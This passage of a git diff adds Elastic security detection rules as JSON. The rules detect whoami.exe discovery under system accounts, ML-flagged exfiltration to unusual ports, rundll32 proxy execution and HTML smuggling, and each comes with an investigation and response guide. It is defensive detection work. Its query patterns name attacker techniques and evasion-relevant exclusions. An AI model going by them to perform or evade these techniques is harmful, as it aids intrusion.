2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n (\n /* scoped for whoami execution under system privileges */\n (\n user.domain : (\"NT *\", \"* NT\", \"IIS APPPOOL\") and\n user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\", \"S-1-5-82-*\") and\n not ?winlog.event_data.SubjectUserName : \"*$\"\n ) and\n not (\n process.parent.name : \"cmd.exe\" and\n process.parent.args : (\n \"chcp 437>nul 2>&1 & C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437>nul 2>&1 & %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\"\n )\n ) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\n \"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\"\n )\n ) or\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "ef862985-3f13-4262-a686-5f357bbb9bc2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1033", + "name": "System Owner/User Discovery", + "reference": "https://attack.mitre.org/techniques/T1033/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "ef862985-3f13-4262-a686-5f357bbb9bc2_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_111.json b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_111.json new file mode 100644 index 00000000000..24d11a1bbf0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ef862985-3f13-4262-a686-5f357bbb9bc2_111.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious use of whoami.exe which displays user, group, and privileges information for the user who is currently logged on to the local system.", + "false_positives": [ + "Some normal use of this program, at varying levels of frequency, may originate from scripts, automation tools and frameworks. Usage by non-engineers and ordinary users is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "logs-system.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Whoami Process Activity", + "note": "## Triage and analysis\n\n### Investigating Whoami Process Activity\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `whoami` utility. Attackers commonly use this utility to measure their current privileges, discover the current user, determine if a privilege escalation was successful, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Account Discovery Command via SYSTEM Account - 2856446a-34e6-435b-9fb5-f8f040bfa7ed\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"whoami.exe\" and\n(\n (\n /* scoped for whoami execution under system privileges */\n (\n user.domain : (\"NT *\", \"* NT\", \"IIS APPPOOL\") and\n user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\", \"S-1-5-82-*\") and\n not ?winlog.event_data.SubjectUserName : \"*$\"\n ) and\n not (\n process.parent.name : \"cmd.exe\" and\n process.parent.args : (\n \"chcp 437>nul 2>&1 & C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"chcp 437>nul 2>&1 & %systemroot%\\\\system32\\\\whoami /user\",\n \"C:\\\\WINDOWS\\\\System32\\\\whoami.exe /groups\",\n \"*WINDOWS\\\\system32\\\\config\\\\systemprofile*\"\n )\n ) and\n not (process.parent.executable : \"C:\\\\Windows\\\\system32\\\\inetsrv\\\\appcmd.exe\" and process.parent.args : \"LIST\") and\n not process.parent.executable : (\n \"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\n \"C:\\\\Program Files\\\\Cohesity\\\\cohesity_windows_agent_service.exe\"\n )\n ) or\n process.parent.name : (\"wsmprovhost.exe\", \"w3wp.exe\", \"wmiprvse.exe\", \"rundll32.exe\", \"regsvr32.exe\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "ef862985-3f13-4262-a686-5f357bbb9bc2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1033", + "name": "System Owner/User Discovery", + "reference": "https://attack.mitre.org/techniques/T1033/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "ef862985-3f13-4262-a686-5f357bbb9bc2_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ef8cc01c-fc49-4954-a175-98569c646740_3.json b/packages/security_detection_engine/kibana/security_rule/ef8cc01c-fc49-4954-a175-98569c646740_3.json new file mode 100644 index 00000000000..1edec5134a6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ef8cc01c-fc49-4954-a175-98569c646740_3.json @@ -0,0 +1,64 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected data exfiltration to a particular destination port. Data transfer patterns that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels.", + "from": "now-6h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "ded_high_sent_bytes_destination_port", + "name": "Potential Data Exfiltration Activity to an Unusual Destination Port", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/ded", + "https://www.elastic.co/blog/detect-data-exfiltration-activity-with-kibanas-new-integration" + ], + "related_integrations": [ + { + "package": "ded", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "risk_score": 21, + "rule_id": "ef8cc01c-fc49-4954-a175-98569c646740", + "setup": "## Setup\n\nThe rule requires the Data Exfiltration Detection integration assets to be installed, as well as network and file events collected by integrations such as Elastic Defend and Network Packet Capture (for network events only). \n\n### Data Exfiltration Detection Setup\nThe Data Exfiltration Detection integration detects data exfiltration activity by identifying abnormalities in network and file events. Anomalies are detected using Elastic's Anomaly Detection feature. \n\n#### Prerequisite Requirements:\n- Fleet is required for Data Exfiltration Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Network events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) or [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n\n#### The following steps should be executed to install assets associated with the Data Exfiltration Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Data Exfiltration Detection and select the integration to see more details about it.\n- Under Settings, click Install Data Exfiltration Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Data Exfiltration Detection, you'll need to enable the corresponding Anomaly Detection jobs. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your network data. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `logs-network_traffic.*` if you used Network Packet Capture.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/ded/kibana/ml_module/ded-ml.json) configuration file, you will see a card for Data Exfiltration Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Data Exfiltration Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "ef8cc01c-fc49-4954-a175-98569c646740_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_107.json b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_107.json new file mode 100644 index 00000000000..6ebcffcebae --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_107.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies child processes of unusual instances of RunDLL32 where the command line parameters were suspicious. Misuse of RunDLL32 could indicate malicious activity.", + "from": "now-60m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "interval": "30m", + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Child Processes of RunDLL32", + "note": "## Triage and analysis\n\n### Investigating Unusual Child Processes of RunDLL32\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nRunDLL32 is a legitimate Windows utility used to load and execute functions within dynamic-link libraries (DLLs). However, adversaries may abuse RunDLL32 to execute malicious code, bypassing security measures and evading detection. This rule identifies potential abuse by looking for an unusual process creation with no arguments followed by the creation of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the behavior of child processes, such as network connections, registry or file modifications, and any spawned processes.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related Rules\n\n- Unusual Network Connection via RunDLL32 - 52aaab7b-b51c-441a-89ce-4387b3aea886\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1h\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"rundll32.exe\" or process.pe.original_file_name == \"RUNDLL32.EXE\") and\n process.args_count == 1\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"rundll32.exe\"\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f036953a-4615-4707-a1ca-dc53bf69dcd5", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "f036953a-4615-4707-a1ca-dc53bf69dcd5_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_108.json b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_108.json new file mode 100644 index 00000000000..28f694e2959 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f036953a-4615-4707-a1ca-dc53bf69dcd5_108.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies child processes of unusual instances of RunDLL32 where the command line parameters were suspicious. Misuse of RunDLL32 could indicate malicious activity.", + "from": "now-60m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "interval": "30m", + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Child Processes of RunDLL32", + "note": "## Triage and analysis\n\n### Investigating Unusual Child Processes of RunDLL32\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nRunDLL32 is a legitimate Windows utility used to load and execute functions within dynamic-link libraries (DLLs). However, adversaries may abuse RunDLL32 to execute malicious code, bypassing security measures and evading detection. This rule identifies potential abuse by looking for an unusual process creation with no arguments followed by the creation of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the behavior of child processes, such as network connections, registry or file modifications, and any spawned processes.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related Rules\n\n- Unusual Network Connection via RunDLL32 - 52aaab7b-b51c-441a-89ce-4387b3aea886\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1h\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"rundll32.exe\" or process.pe.original_file_name == \"RUNDLL32.EXE\") and\n process.args_count == 1\n ] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"rundll32.exe\"\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f036953a-4615-4707-a1ca-dc53bf69dcd5", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "f036953a-4615-4707-a1ca-dc53bf69dcd5_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_106.json b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_106.json new file mode 100644 index 00000000000..f382d7b6e4c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f0493cb4-9b15-43a9-9359-68c23a7f2cf3_106.json @@ -0,0 +1,140 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a browser process to open an HTML file with high entropy and size. Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious HTML File Creation", + "query": "sequence by user.id with maxspan=5m\n [file where host.os.type == \"windows\" and event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy >= 5 and file.size >= 150000) or file.size >= 1000000)]\n [process where host.os.type == \"windows\" and event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.entropy", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f0493cb4-9b15-43a9-9359-68c23a7f2cf3", + 